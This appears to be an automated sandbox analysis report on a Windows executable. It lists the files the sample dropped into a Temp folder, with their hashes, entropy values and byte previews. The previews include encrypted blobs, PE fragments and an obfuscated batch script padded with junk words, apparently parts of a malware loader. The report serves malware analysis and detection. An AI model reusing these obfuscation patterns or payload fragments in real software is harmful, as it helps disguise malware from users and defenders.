                                                                                Preview:h..K..L$.....S.D$4SP.T$,.L$.........D$@P.t$.....I.....D$....tm<.ui.D$@.u=.D$..L$..D$ P......D$0P.L$..&....D$lP.L$..8....t$.....I....u..D$@PV....I....D$.u...D$..V....I...V....I..\$..L$0.....L$ .....L$.....^..[..].......3............3.......U......l...SVWj...T$.j..\$..D$P,.......I....D$HPW....I..u.......T..........D$HPW....I...........L$..T....L$(.K....D$lP.L$<.l....D$(3.P.D$.Pj..L$D.8.......L$8......D$(P.L$......j..t$..L$ .......u..D$P....t..D$P;.u..L$.......L$(.....L$..{....>...Q...W..X.I._^..[..].U...<SVW3......VPj.Vj...PQ.3....I...U....u.2..Ij.Y3..u.V.}.u..E..u.Pj(.E.u.Pj..E.Ph..-.R..P.I..u.....X.I...t..E....._^[..].U..(.L.....x%.u...@...tSV3......VPj.Vj.PQ....I.....tDW3..E......}.u..V.u..u....E.Pj..E.Pj..E.Ph..-.S..P.I.S....X.I._..u...@....3.8E....^[..].U...4...SVW3.Vh....j.[SVSh....Q....I......u...@...|h(.........VP.e............................u.j(Yj.XVf.......E.PR......f......PRPh,...W........P.I.W....X.I...t.3.f.}....._^[..].V..F.HP.....f.8\t.hL,I...

                                                                                C:\Users\user\AppData\Local\Temp\Being

                                                                                Download File
                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):48128
                                                                                Entropy (8bit):6.469535173120392
                                                                                Encrypted:false
                                                                                SSDEEP:768:i7YeQ0p4pZP40VLhDPCp5eqMw0jR6s6bvx875rLjDsOc/WY7Jx2pQ44GMKnPml5P:Ig/Pp5q/qw0j8sgyZpQ4VMEPmfP/b/p5
                                                                                MD5:2EF14ED9865E29DF2F90F57D1A28B9C2
                                                                                SHA1:5EBE83C18409006C66613FECBB72A281AC1725F7
                                                                                SHA-256:AB3CFA206585CA600F599485F2063082E5E7FCF22AA26BE460BD4043E0F936CB
                                                                                SHA-512:4491BC41DC2A9EEAC958363975927885E2E5F7071C3C12328D5B4B73CF92844E2EB9556C5C37A46F8FB1A0BE849D75142E2F71DF13F5D1F1033CC2663D4DF0A4
                                                                                Malicious:false
                                                                                Preview:.u...%.......t[j.j..u...%.......P..5...E.P.M..5....s.....uk.M..A..x..~"j.j......P...5...E.P.M..5....r..h..I.....2...M...0...M..E......E.......0...E......E......r...M.j.h..K.j.h.....}....y..O..E.....M...@.Ph..........M..0...E......E......\r...u.K..L....q...8....q...E..E.j.P.E...PW.=6......}s...E.P.M..4...]...q........q........q......,...M...t..+...q....*...q........q........q...M...+...M...t..N+...q...*...q....@..M.Pjr.)....E................r...M../...M..E......E....../...}..E.P.E..E.....PS...E......y...M...).....uAh..I..%1...M..E/...M..E......E......//...E......E......E.@...Nr...E.P.3...E.P.M..}3....\....M.M.Q..`.......M..e......r...U..........t....M.......E......E......M...\....E.P.s....E.@..q....@.Ph.....X....q....@...Pjr.E....r...e...E.e..j.P.E..E.....PV.D4....x..N..E....f9x.t...@...Pjr......M..+....s...M..0......y.3..M......3.U......s....s.....n....U.;....s...~s..j.h..........ks....@...Pjr....t...M..1...uu...E.E..u...E.........D.E...qu....u...z.

                                                                                C:\Users\user\AppData\Local\Temp\Below

                                                                                Download File
                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):34816
                                                                                Entropy (8bit):6.732046676799001
                                                                                Encrypted:false
                                                                                SSDEEP:768:Dy3P8uMxworO4aIPxwW9iwczQqrQfy0cSoWtJyDTOeQAOFCCkPsiNdHnMSCKB5Nc:ugrO4aK9iwcznrQfy0c4cDTOelOFCOBF
                                                                                MD5:BE999304B56A993D7E596DE3C484E392
                                                                                SHA1:FB77D67ADC3DE479AABE88683702A0E2FC209890
                                                                                SHA-256:970527FCAFC7952B2C97CD4833680A9B4420C14711DEB6EDBCEAEB34259A9883
                                                                                SHA-512:38F10DC42956829E4472D0EB0AF8BB78362C1422D5B290B4A02FFA72C293E49318C5DF0200B34A7FE756B376BB07387F2DF7C19B26B341B01CC1628D7BEA57E2
                                                                                Malicious:false
                                                                                Preview:K....t....t.3........;E...R-...E....E.@P.u...V.u..u..&.........8.....(...E...@..P.u.V.u..u..q&..........'...E.;E....,..;~|.............}..t-..%....=....u.............%...............E......wE............w..........r_........... uQ......................u8....../ ..w.t{........)w....$.D..$...D..._ ..tZ...0..tR...............KK..........y.I..A..3....E.hJ.....!?J..<.p.K.....;M....+...E....E.}.....+..@..E..E.@P.u.V.u..u.. %..............&...E...@..P.u.V.u..u...$.........j&...E.9E....+..;~|..7..........}...M.t-..%....=....u.............%...............M........U........KK......%....y.H..@.....M.hJ.....!?J....p.K....t....t..._t.3........;E....*...E....E.@P.u...V.u..u..!$.........)....%...E...@..P.u.V.u..u...#.........k%...E.9E....*..;~|..8..........}..t*..%....=....u.............%...............E....UJ.....UJ.;.r..@.;.t;..;.s.}.....*...E....E.@P.u...V.u..u..\#.........c.....$...}.....)....E...@..P.u.V.u..u..(#..........$...U.;U....)..;~|..g..........}..t*..%....=....u.....

                                                                                C:\Users\user\AppData\Local\Temp\Black

                                                                                Download File
                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):30720
                                                                                Entropy (8bit):6.62993385150548
                                                                                Encrypted:false
                                                                                SSDEEP:768:PNulI1+lRKw4sWGuv6crjQAVlvZEx2zinQK:8lvlao/RIs2ziQK
                                                                                MD5:720E09CB5B520EE4820551EEBBCA39C5
                                                                                SHA1:E6A0AA1A827D79C8F6BDFE3528A06A31B9583A7C
                                                                                SHA-256:6F2F6DCFB3A1A506FDBAB909BB76621307CC08A19CA86BB136C1FAE68C75708A
                                                                                SHA-512:B6F9E6C68063E60312227F1F8776E47CEB986D879875E1561BB414A74878960E685F800CB57A5F7393B992A75914962FCADF882C9063D96C1ECF27EE7623A0C6
                                                                                Malicious:false
                                                                                Preview:....YY....3.^].U..SV.u.3.F.$.<.uB.F.....t9W.>+~...~.W.v.V.y...YP."......;.u..F...y.....F....N. ..._.N...f....^[].j..[...Y.j.h0.K..Z>..3..}.u...u.W.;...Y.$V.M!..Y.}.V.....Y...}..E.............a>...u..}.V.!..Y.j.hP.K...>..3..}.!}.j...P..Y!}.3..]..u.;5DrL........@rL......t].@..tWPV..!..YY.E......@rL.....@..t0...u.P....Y...t.G.}.....u..@..t.P.j...Y...u..E.e.......F.]..}.u.@rL..4.V..!..YY..E...............t..E..~=...]..}.j..Q..Y.U.........f9E.......V.u..M..}....u.......u..M..A.f...w.f.. ..........j.f9U.s(.u..a..Y...E.Yu........*...............M.Qj..M.QRP.........u..E...........E..}..^t..M.ap...].U..j..u..B...YY].U.....M.SW.u.......]......;.s`.M.yt.~..E.Pj.S..o...M..............X.....t..}............t..E..`p.........}..t..M..ap........E.xt.~-..M.....E.Q...P....YY..t..E.j..E..]..E..Y....=..3.A..*....]..E...E.U.j..p.j.RQ.M.QW.......E.P......$..u.8E...{....E..`p..o......u..}....E.t%.M..ap.....U...E......}..t..M..ap..._[..].U..=(RL..u..M..A....w... ..].j..u.....YY

                                                                                C:\Users\user\AppData\Local\Temp\Cu

                                                                                Download File
                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):61440
                                                                                Entropy (8bit):4.48000136288079
                                                                                Encrypted:false
                                                                                SSDEEP:768:s+AGWBA60iPTcf4qSq25N8EH/i6mxyyM0Dj2Bmgari07L:s+l6JPTcUNx6/xhgariw
                                                                                MD5:F58D54C032618394502D749FE23D15CF
                                                                                SHA1:33C118E7866C7F8883735AEE557C121FC188601E
                                                                                SHA-256:6BD7FF074DF7F2097E1A3349286CC613C97FD4CA47A7BC64FCB099494B1D3CBC
                                                                                SHA-512:DBEAFFA94BB28CC736A7268563A6D5E11D13F9A32B3219BA869D54C74E3C855966C9B8ED20E44F8C79B5E5FFAE57131C6D2653A04848804ACE1F25425CD52E34
                                                                                Malicious:false
                                                                                Preview:............................................r.r.r.r.r.r.r.r.r.r.r.............................................................................................................................................................................................r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.

                                                                                C:\Users\user\AppData\Local\Temp\Dealt

                                                                                Download File
                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):55296
                                                                                Entropy (8bit):6.748710728556714
                                                                                Encrypted:false
                                                                                SSDEEP:768:cbHazf0Tye4Ur2+9BSCVoyO15DuOKHnrxbxZiUCu2iPaLTQ7Q1tCwqVLT:cuZo2+9BBVgCOa1ZBPaPQaEwof
                                                                                MD5:D73DEDC9A698848920C42BB278BAEE79
                                                                                SHA1:FD4D0BAAC3F2466FD898DD40F6003F22A837DACE
                                                                                SHA-256:0EEAB4E2C06B3FCAC8FFA673E9A47D2FC746168B1D4F87679E7775F5940742A5
                                                                                SHA-512:1AA4B3030479ADBD091EBCEAD8EA070D638FE2EC7A2B0D046B6D786412C9CABE36D25EF8E8D228DE0124BE546E09E680DDC6E893680C0D84D0DF5197BA198F60
                                                                                Malicious:false
                                                                                Preview:<...h..)...U^<;.B..6...*.t~.kSY.w.-......lM..m..6i.j.u.,.....FZ....=..uX...).O..F..6.....!...s|_.........0;..t......3.>p..C;.V.Y....).sv.n........g.hXy..~t...CiLcke...iS.j/@..4.%..}....4...r5*m....,/...;..+|..........x|./#..-5P.b9.a....{8u.z....(.]\...L/.8..].......5.............,gb.".7T5P...zA.x8.}..fb...m.9}e.....J.Q.l.N.x...G...dt..CC.-.0Tq.^T5`.H.......-...wv0.#..G..:...YV6..Z\+.......e.]N..C.......i..m.R.r...............a..d....V...SL/..".PX......m8.l..n.[@;@.r.r..2+WD.....IDAT`.1.X.=..3G...rw.Y/U..q.>.........7^.s...n0...P.'.....[...yn@../&.7.D..%....n..%]...V.6..K...\N].......<.......^oBUL.r..u?<.McKtp..&8.;.z.irq.... 3.V..ra.....%^S_.$.v...A.o:!.^2D...4....+....i....].V.7.u[..3y^9?E...".!.u...,...g:f/%CU.<`6...m.p|_7..w.j...o\......r.....n-p....o........oo..C.i8u.).=...3.i.d.!..o..p..iln.W/N5.X..".8.C.Iw;C.b!...E*.j.5.sn.,.@...4.|M..5.a.'..G.].4S......-&.W.v...r}:..N.bi.].1C...$...w=].~6..6L...YGb.M....xl........b..^.

                                                                                C:\Users\user\AppData\Local\Temp\Desktops

                                                                                Download File
                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):35840
                                                                                Entropy (8bit):4.693095986074866
                                                                                Encrypted:false
                                                                                SSDEEP:384:93LfTN319stEjFKr+/hdvE6HDyOpbM136KeBzC6GFe46Jf:9LTN3Efr8qcDP8WBosdf
                                                                                MD5:DB348435174A3FF130CD5F32E91FC842
                                                                                SHA1:5ACF92CD21338C9229D0CDF94AEF5C624EB4BF35
                                                                                SHA-256:2A6556ABB0971B84CBA5249234D57DE5BDB424009B67D7AD1F2591F8DB7A2970
                                                                                SHA-512:266BC6C843D2BE25CB13F91251F6A70C3BB68D0BBA165615ECBEB25D49CB107F3978054362EDE21117BD1F5B752D35568F35724AE27A13A273F45E1943D04D33
                                                                                Malicious:false
                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\Directors

                                                                                Download File
                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):67584
                                                                                Entropy (8bit):5.340379519959865
                                                                                Encrypted:false
                                                                                SSDEEP:768:2I4kSmEusWjcd+DvFQC7VkrHpIu9xhSaAwuNbCc/mexQ:CusWjcdGQuklIusaAwu9hPO
                                                                                MD5:4E7D52B6E560116D16AF233D5FD3B503
                                                                                SHA1:3BA4C4DBA3E36928200145ABE7AD3DD398118184
                                                                                SHA-256:C04C589932FD74272BF0F58A078F79FFD9FE159EF9A3710A602B1530D9EA63DA
                                                                                SHA-512:AC6EBD550423B42142B704BE5BFD4956850056DEEE2DD7C124EED897F71CCA8B215A96DF8065C49CA0D20B318CF42F35E4CEFECC9D911916EB056F332417C9F5
                                                                                Malicious:false
                                                                                Preview:...I,+...?..........U&X>.?..........i....?.c4...?.......?.......?..N..T.?..j8.6.?.f*"!..?~w."...?nJ.R...?1...7!.?|.GD.|.?.......?...*.a.?.}. ..<.......?.pA..?................ZM..$^.@........].>.=..@........Z..7.@.abK...?..Z...@...t...?..,....@.T..4s.?.a.g...@Xp.M...@.D.$_..@.n}in..@..).M..@......@P(.*.C.?. ...mz........@.E3.&..................fY.eY.!@..........,..d&@........#7.B.,@.......@=..U.&2@UUUUUU.@9.E4..7@.......@.}..=m=@.......@. 8..B@.[..[..@.u+E6.G@.......@.......?...............@.........................HO..3.........oX... ?..........%......#.Z..."S-...>Q..!.r.?.M%....;......c..d3.>....$9t?..Jy.........A].VJ...].>Q...I?...Z.I..7t.`..=.........cH....?.......?..........ZS .+...............?..........Y..9..m|1..~...-g....>.b./[E.?8..Q.S...7..K........>.....p?.[j3.H..X.&.C.U..x.....>Xzv...C?...*..a.#wi#:...........w.B..?.......?............x.#..........qQ....?.........L.y.a...F.......5d....>2..*.q.?.........?c3y...0...>q...k?.........g\>{.O.>>..u.

                                                                                C:\Users\user\AppData\Local\Temp\Diy

                                                                                Download File
                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):48128
                                                                                Entropy (8bit):6.233755017350427
                                                                                Encrypted:false
                                                                                SSDEEP:768:B2G+jvEHHaD3Sr0Wsc1NKcdvq6LqgaHbdMNkNDUPSdK8M4INduPbOUGM4INduPb8:BZ+In23SwFc1vtmgMbFuPO1MBNfMBNB
                                                                                MD5:6A6883165351EC177F20A254C7F1CB17
                                                                                SHA1:ACABDDD880C853AE07B2BB693DA9067F5ED2AF79
                                                                                SHA-256:A6FAD3D46B0A8E74318B87AE8553261274E39617D1E27B7C3C6E1988EB588E4E
                                                                                SHA-512:24B06662DC09A3EAAED308BA6D0BCDD95E52C781E3262E63233C33A761A430715B08AC36047E9AB64E65F43CD9C0043D09257FF4727072B81A6E84A30E596753
                                                                                Malicious:false
                                                                                Preview:R.L.R.E.C.V.M.S.G.....G.U.I.C.T.R.L.R.E.G.I.S.T.E.R.L.I.S.T.V.I.E.W.S.O.R.T...G.U.I.C.T.R.L.S.E.N.D.M.S.G.....G.U.I.C.T.R.L.S.E.N.D.T.O.D.U.M.M.Y.....G.U.I.C.T.R.L.S.E.T.B.K.C.O.L.O.R...G.U.I.C.T.R.L.S.E.T.C.O.L.O.R...G.U.I.C.T.R.L.S.E.T.C.U.R.S.O.R.....G.U.I.C.T.R.L.S.E.T.D.A.T.A.....G.U.I.C.T.R.L.S.E.T.D.E.F.B.K.C.O.L.O.R.....G.U.I.C.T.R.L.S.E.T.D.E.F.C.O.L.O.R.....G.U.I.C.T.R.L.S.E.T.F.O.N.T.....G.U.I.C.T.R.L.S.E.T.G.R.A.P.H.I.C...G.U.I.C.T.R.L.S.E.T.I.M.A.G.E...G.U.I.C.T.R.L.S.E.T.L.I.M.I.T...G.U.I.C.T.R.L.S.E.T.O.N.E.V.E.N.T...G.U.I.C.T.R.L.S.E.T.P.O.S...G.U.I.C.T.R.L.S.E.T.R.E.S.I.Z.I.N.G.....G.U.I.C.T.R.L.S.E.T.S.T.A.T.E...G.U.I.C.T.R.L.S.E.T.S.T.Y.L.E...G.U.I.C.T.R.L.S.E.T.T.I.P...G.U.I.D.E.L.E.T.E...G.U.I.G.E.T.C.U.R.S.O.R.I.N.F.O.....G.U.I.G.E.T.M.S.G...G.U.I.G.E.T.S.T.Y.L.E...G.U.I.R.E.G.I.S.T.E.R.M.S.G.....G.U.I.S.E.T.A.C.C.E.L.E.R.A.T.O.R.S.....G.U.I.S.E.T.B.K.C.O.L.O.R...G.U.I.S.E.T.C.O.O.R.D...G.U.I.S.E.T.C.U.R.S.O.R.....G.U.I.S.E.T.F.O.N.T.....G.U.I.S.E.T.H.E.L.P.....G.

                                                                                C:\Users\user\AppData\Local\Temp\Elliott

                                                                                Download File
                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):114
                                                                                Entropy (8bit):3.5707554475367496
                                                                                Encrypted:false
                                                                                SSDEEP:3:gXK2CMRoyD/WQMRiWUqt/vllpfrYZ0:g6cOmMReqjP
                                                                                MD5:0155FAC83FBFAC34AAF9BFCC3CB3A75E
                                                                                SHA1:3D78DB6742774D1BA3EF4E16D875263A0A57443D
                                                                                SHA-256:015A5397FBE4822CD1F4ED2F49BD7065A384949342FC3B33A57F3DFDB7EE9818
                                                                                SHA-512:64FD598B7C5D14AE0D8F3421862CC87CFDE6B1255F34345B745420EECE0830A8693AC891F094986D440371E02FD3BBCE71E042BBCC1FE9B8A746723607C400C8
                                                                                Malicious:false
                                                                                Preview:ReprintVerificationMercyRepository..MZ......................@...............................................!..L.!

                                                                                C:\Users\user\AppData\Local\Temp\Exclusively

                                                                                Download File
                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):30720
                                                                                Entropy (8bit):6.608167810589763
                                                                                Encrypted:false
                                                                                SSDEEP:768:Msc7nj6evkuKa5GCJ5YxtXazSTvHZ9ijrUTS7:MHHvpKa5Gk6/vij4S
                                                                                MD5:C62C379E829A5BE535E99B5FD0FD7B06
                                                                                SHA1:08A46D476BDF73B1B4C590B573BD86DF974A6954
                                                                                SHA-256:2CD989421CA19C294FB517AD67AF162261C8B7266E17F213BA5D7F0EBDFB9FA7
                                                                                SHA-512:747EB35C68EA6B7DF06C50C11578FC79D183659592DE23E88427743AC887E4C71F4E2156F6AEB8B03D957336E28BD591627B26ACC454510C1BA325C0696E73E0
                                                                                Malicious:false
                                                                                Preview:.}...3.f9E....H%..........E....E...M..E..}.f..t6....}..../3.f.......f9E......$.. .A.3.@.A..A.0.Y......}.j.X;.~..E..}.......?..3.j..}.f.E.]._...................u..].Ou.}..]..U.u.j.[..y7.......~-.]....................O.].u.....].3.U.u..u..E.@.E..~..}...M..........u...}.........}..........E..4......................E....8.M.;.r.;.s..B...;.r....s.3.A...M.t.F.E.<.;.r.;.s.F.u...U.........U..U...?.......6.U....M..E.....0.]..A.E.H.M..E...~..E.E..>....u..}..A....<5|E...99u...0I;.s.;.s.Af.....E.*....H....\..3.@.M._^3.[.!....].90u.I;.s.;.s.M.3.f.......f9E......$.. .A.3.@.A...0.....3.SSSSS.>....U..M.3....t......SVW........t......t.........t.........t.................t........#.t.;.t.;.t.;.u...`......@...... ......._#.^[......t.......t.;.u......]..@]..@...].U......}.f.E.3..t.j.Y..t......t......t..... t......t.......SV.........W.....#.t&......t.......t.;.u.........................t.;.u.........................t........}....E...#.#...;.......V.?......Y.E..m...}..E.

                                                                                C:\Users\user\AppData\Local\Temp\Exhibit

                                                                                Download File
                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):75776
                                                                                Entropy (8bit):7.997426404870456
                                                                                Encrypted:true
                                                                                SSDEEP:1536:pwHfz6DaJt+kX2UsIP+dzAOcsx8dI3nat3Bt7L8A8Smd/kw819:poz6DykUmg++Ocs/qPt3Ev819
                                                                                MD5:3518AAAF5366B46B638C08F39548AAF9
                                                                                SHA1:8B9D27A900934012735399DC261DDE510C79992B
                                                                                SHA-256:4886AF9DC9FBD57CE7C8FD486247790BFACD468184CF1EC8F66931D262E06729
                                                                                SHA-512:3919CE7F63753778BEF4DD2D247D656566DA553203DF063F1BBA9F7E9F7134ECD4C7C5BFD21B66CDA76B5031679CAB536B818EF6EC2A29E64C9E2C6B287CDEBD
                                                                                Malicious:false
                                                                                Preview:..&s cW.,.TK%.......,s..G".$....`USD.......g....7.!.k"..r.4...ae&.U[.......g.jcc..;.%.2.Z..y....1i>.w.qM.b.=..f.&...#.(ef..1..e.8.%.O.R.5.b...../.`.zF...B.W..4..x.k...N(.R...p....M....~U<O.......}*..........E.fp0...#.*RD...4\;..V..X.W.....}..6.....iM.....i.'....O...c3.Z...F..Q/.. ..oR..N....O...?.z....wxx...Zh..r9La.'..U....`..W..x.........%a..A.!h.l.#..Y.MR9o.).^..?..6....O...58.......3.Rg...g.dhUi...U.d..o..9.,.v.!.!^..z....cz]C.bp...M.x3.....x0QG.Hw......"V./\m..j.[u@..`....n3(.{..y.?..{j"?.jrd........'.....#....B.`F..*.!6Hc..`.2C..X.g[I.n..s|....3/....u.hD]R.....=_s..6Vs......-s.K0G.lv..^.d~..n.r.+..m...6._~$.......C..D.E..!lUlnG..2..?.S..?r.........(...!.!....G...2N.`......A.w.`7..-...(2....{....1....v5..'yP.%.d.^^rw..8..0F&..Z....g.%......c[.Hj...3.dO:+E..OG.z.j_...9{........)$.L.'E.-g...{..g.. ...O......p(.&#L.)B..|eYs.W..L..!h5.>.g...o..U.C8t...D....h..9........=...l..m4.e#...7...l..]H..zG^.u}o...DfV.&YX.e.B=M...Fh..5Nj.;..a

                                                                                C:\Users\user\AppData\Local\Temp\Fail

                                                                                Download File
                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                File Type:ASCII text, with very long lines (1538), with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):22996
                                                                                Entropy (8bit):5.020348530355967
                                                                                Encrypted:false
                                                                                SSDEEP:384:fRXCocw4Tvb7yU9ufdQgsIvlIw00bzj+ieJ5hAAI9xm3CDa+DrrydDroY5XHYXvp:DSjnaewJ+iX9xCCn/ryd/v4XhL
                                                                                MD5:4B3A0E1F46E0A61C8BFE9B6619A0D12B
                                                                                SHA1:5014B84611B06C05F3CEFD3F3E74713301A50FFE
                                                                                SHA-256:ECC8ABC33ADDDBA1A6FE1DC626698ABA572B61FE8A6988CE541DDB7B16F2E7C7
                                                                                SHA-512:540A8C2B3561087AFDDB79CC4827C0232B8BFC4486DBD535708D76AD6804E2B8526CB28168D717749E1983329AD20567DA19AD1283570CDD1E85D676368651C6
                                                                                Malicious:false
                                                                                Preview:Set Summaries=5..xuEssentially Merger Methods Polo ..BtLSRays ..GWDeviation ..CAUSkating Choice Utilization Differential Ft ..FcHints Estate Embedded Working Cleveland Humanities Mike Shanghai ..Set Rolling=U..IkkThrowing Excellent Routers Porter Obligations ..DTkKid Guys Offense Hiring Modes Cool Jewel Erp Acer ..cQHNot Preferred Rw Samba Challenging Equation Sea ..WbaMeals ..PfSvBend ..wXxlBrazil Foot ..FrPoems ..Set Adapters=K..OOLVTherefore ..orBMerger Lawrence Pulled Ribbon West Recognized ..tDMMug Wound Consisting Hundreds ..dxhManaged States Tank Logan ..KoSan Merger Searches Exercise Playlist Launch Measurements Strategy Leaving ..Set Springfield=i..uWmGenes Congress ..LJAiSenators Challenge Broadband Pure Operational Complete Port ..DDAdvanced Vat Availability ..mHETEmploy Toilet Differences Oasis Fish ..iUYbDiscussions Healthy Algebra ..Set Loaded=f..RkdSoil Semester ..GmjDryer Develop Authorities ..HITextbook Textbooks Laugh Foul Turned ..PfDiscounts ..FVGotten Blair Severe

                                                                                C:\Users\user\AppData\Local\Temp\Fail.cmd

                                                                                Download File
                                                                                Process:C:\Windows\SysWOW64\cmd.exe
                                                                                File Type:ASCII text, with very long lines (1538), with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):22996
                                                                                Entropy (8bit):5.020348530355967
                                                                                Encrypted:false
                                                                                SSDEEP:384:fRXCocw4Tvb7yU9ufdQgsIvlIw00bzj+ieJ5hAAI9xm3CDa+DrrydDroY5XHYXvp:DSjnaewJ+iX9xCCn/ryd/v4XhL
                                                                                MD5:4B3A0E1F46E0A61C8BFE9B6619A0D12B
                                                                                SHA1:5014B84611B06C05F3CEFD3F3E74713301A50FFE
                                                                                SHA-256:ECC8ABC33ADDDBA1A6FE1DC626698ABA572B61FE8A6988CE541DDB7B16F2E7C7
                                                                                SHA-512:540A8C2B3561087AFDDB79CC4827C0232B8BFC4486DBD535708D76AD6804E2B8526CB28168D717749E1983329AD20567DA19AD1283570CDD1E85D676368651C6
                                                                                Malicious:false
                                                                                Preview:Set Summaries=5..xuEssentially Merger Methods Polo ..BtLSRays ..GWDeviation ..CAUSkating Choice Utilization Differential Ft ..FcHints Estate Embedded Working Cleveland Humanities Mike Shanghai ..Set Rolling=U..IkkThrowing Excellent Routers Porter Obligations ..DTkKid Guys Offense Hiring Modes Cool Jewel Erp Acer ..cQHNot Preferred Rw Samba Challenging Equation Sea ..WbaMeals ..PfSvBend ..wXxlBrazil Foot ..FrPoems ..Set Adapters=K..OOLVTherefore ..orBMerger Lawrence Pulled Ribbon West Recognized ..tDMMug Wound Consisting Hundreds ..dxhManaged States Tank Logan ..KoSan Merger Searches Exercise Playlist Launch Measurements Strategy Leaving ..Set Springfield=i..uWmGenes Congress ..LJAiSenators Challenge Broadband Pure Operational Complete Port ..DDAdvanced Vat Availability ..mHETEmploy Toilet Differences Oasis Fish ..iUYbDiscussions Healthy Algebra ..Set Loaded=f..RkdSoil Semester ..GmjDryer Develop Authorities ..HITextbook Textbooks Laugh Foul Turned ..PfDiscounts ..FVGotten Blair Severe

                                                                                C:\Users\user\AppData\Local\Temp\Further

                                                                                Download File
                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):69632
                                                                                Entropy (8bit):6.4963210630411625
                                                                                Encrypted:false
                                                                                SSDEEP:1536:U6CV21YEsmnq7Cv/+/Coc5m+4Xf8O46895LmNpRGf:VCV26MqgQTc5F446iYNpA
                                                                                MD5:8641DD71E65547ED9A9C1AF825F9D9DB
                                                                                SHA1:0B326F2E487F75ABC13A45FDD09F13480C749C54
                                                                                SHA-256:D46CD3CE10C355622F4123A28F907292A65E0746AB8A6385C0EA212EE9EB2A0B
                                                                                SHA-512:496C1C1F689F2F89D636D07BC26FD442A9850043D02007F06D982A77E377AA6CB7CBE6E0C7CD97B2CBF99F515264F06EA387630A4675EAF092776E4ECD5387C0
                                                                                Malicious:false
                                                                                Preview:This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L......Z.........."...............................@.................................Jo....@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B.........................................................................................................................................................................................................................................................................................................DaL.....h..C..\...Y...L..h..C..K...Y..N..h..C..:...

                                                                                C:\Users\user\AppData\Local\Temp\Hours

                                                                                Download File
                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):46859
                                                                                Entropy (8bit):7.99648944840998
                                                                                Encrypted:true
                                                                                SSDEEP:768:+0nl55u+ywjONTBQNFKv2XQyW+2e7hMODDD7hfFVfU7ujG6+AVHHtO8FcvAcgmlh:+WlLjOsXKegFe7WOnvhvajSVHHPbcgmT
                                                                                MD5:6BFBE05FB38301713B9F66B5EE472D0B
                                                                                SHA1:752B64C7BB7B4D79D589C3F1D0D2640693E1DAA7
                                                                                SHA-256:BDC02640CB3D780B5EC58B66328D6591BF53F3786A5A9B14E56A132E4DD6DB6F
                                                                                SHA-512:30CDE90D57BC143B658FAC522A84A635A37DD6A2503666945C27BAD8DFB90488398B8B39D5C260DC0D8C8B9797AC7CF2D38420835BF6E22C5346BE9C594DD49C
                                                                                Malicious:false
                                                                                Preview:.0.b...`.-.%Q_.pH....S..9z:...........W\.....x....=k'q.4K,...Oya.7....k....7h...O.ny...Ld*.fa.-..h.+7j..t..B.!fH.0.cE..u..4m.........B..u}y..:....vG....."vP...tg...o...Q...D..*.T.,:.s.(...49:<o53....3.._....w...".K....t..e.......9.....)......1dN ..B...!..Q_X.W.Ak........1...k........F....{I.......'o....}qw.....i}..A-...v3.u.DVr.0.Xu.##..4j...[......W.E...'Z.............}.R.@..$~B..9...D`:IK..?.Q.......4Fj..x..w.{9\_|..3. M...cZvfm.k..x...W..5l.O..S(.........g.(^p{OM.\...R...U(F.YEM.uA.+...B...b.J.w.K.......ns.}...z..?O..V...b.....ES..vr....3..w\R..F..;2%..t.2.x........`....B..5..../8..!$..OZ.e=.q!X.@.!.[g..b...4y..D.9..I...K....f5^.).....=...wWS...j.>.8..E.......}m.a.w...t..{..m...=. AdR..&`'..=..V.m6,....gL....T..[...2.8a.V...p.....L.Go.N...V..d\.?........$m.[x6..P..[Ou..j..x...>.4..*. .......[b\;....31..J.....3:WPq-......D...ZNk=(S..a.T...b...3..0f.w.^h.q.x"M..l.W.A....Ru!..*..}v(.3Mfa......:..........nn..<.[.d."...!....Nf. .q.rN.:@.t=..

                                                                                C:\Users\user\AppData\Local\Temp\Katrina

                                                                                Download File
                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):34816
                                                                                Entropy (8bit):6.687027088281148
